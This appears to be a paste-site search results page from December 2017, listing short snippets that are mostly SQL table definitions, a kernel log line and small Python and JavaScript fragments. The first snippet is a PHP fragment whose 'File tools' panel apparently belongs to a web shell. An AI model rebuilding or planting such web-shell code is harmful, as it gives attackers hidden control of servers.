42.7K results in 782 ms
8 years ago · Dec 05, 2017, 04:24 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
8 years ago · Dec 05, 2017, 03:36 PM
available [ 1.920559] omap2_mbox_probe: platform not supported [ 1.924405] VFS: Disk quotas dquot_6.5.2 [ 1.924734] Dquot-cache hash table entries: 1024 (order 0,
8 years ago · Dec 05, 2017, 03:08 PM
where [name] = @SP_NAME) is not null --if it exists, then insert from it...
8 years ago · Dec 05, 2017, 02:52 PM
SET QUOTED_IDENTIFIER ON; GO IF NOT EXISTS ( SELECT * FROM sysobjects WHERE
8 years ago · Dec 05, 2017, 02:50 PM
key/value pair to storage, if key already exists updates value getItem retrives
8 years ago · Dec 05, 2017, 02:50 PM
key/value pair to storage, if key already exists updates value getItem retrives
8 years ago · Dec 05, 2017, 02:40 PM
CREATE TABLE IF NOT EXISTS forum.pessoa_fisica ( id INT NOT
8 years ago · Dec 05, 2017, 02:34 PM
create table if not exists kup_classification ( cuid bigint not
8 years ago · Dec 05, 2017, 02:28 PM
Table `mydb`.`images` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`images` ( `id` INT NOT
8 years ago · Dec 05, 2017, 02:20 PM
CREATE TABLE IF NOT EXISTS `mydb`.`images` ( `id` INT NOT
8 years ago · Dec 05, 2017, 02:00 PM
Table `mydb`.`images` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `mydb`.`images` ( `id` INT NOT
8 years ago · Dec 05, 2017, 01:24 PM
TABLE IF EXISTS `cars`; CREATE TABLE IF NOT EXISTS `cars` ( `id` bigint(20) NOT
8 years ago · Dec 05, 2017, 12:46 PM
database entechnic; use entechnic; CREATE TABLE IF NOT EXISTS mult_choice_questions ( id int auto_increment
8 years ago · Dec 05, 2017, 12:44 PM
cordovaSQLite.execute(db, 'CREATE TABLE IF NOT EXISTS condicions (key text primary
8 years ago · Dec 05, 2017, 12:36 PM
crashed." """ pl = Pipeline(self._workspace_manager) if not os.path.exists(pl.get_completed_pipeline_list_path()): os.makedirs(pl.get_completed_pipeline_list_path()) # if pipelines exists, use it to override
8 years ago · Dec 05, 2017, 12:10 PM
USE `Lab_Database` ; -- ----------------------------------------------------- -- Table `Lab_Database`.`PC_Liste` -- ----------------------------------------------------- CREATE TABLE IF NOT EXISTS `Lab_Database`.`PC_Liste` ( `idPC_List` INT NOT
8 years ago · Dec 05, 2017, 11:56 AM
if exists individu; drop table if exists cinema; create table individu ( num_individu integer
8 years ago · Dec 05, 2017, 11:18 AM
KEY AUTO_INCREMENT, cd_tipo_quarto INT NOT NULL, nm_quarto INT ); DROP PROCEDURE IF EXISTS sp_gera_carga_quarto; DELIMITER | CREATE PROCEDURE sp_gera_carga_quarto( p_cd_tipo_quarto INT
8 years ago · Dec 05, 2017, 11:08 AM
v in converted_fields.items()]) create_sql_statement = "CREATE TABLE IF NOT EXISTS {}.{} ( {}{} );".format(keyspace_name,table_name,db_fields,primary_key_string) return create_sql_statement #example
Total pages: 2134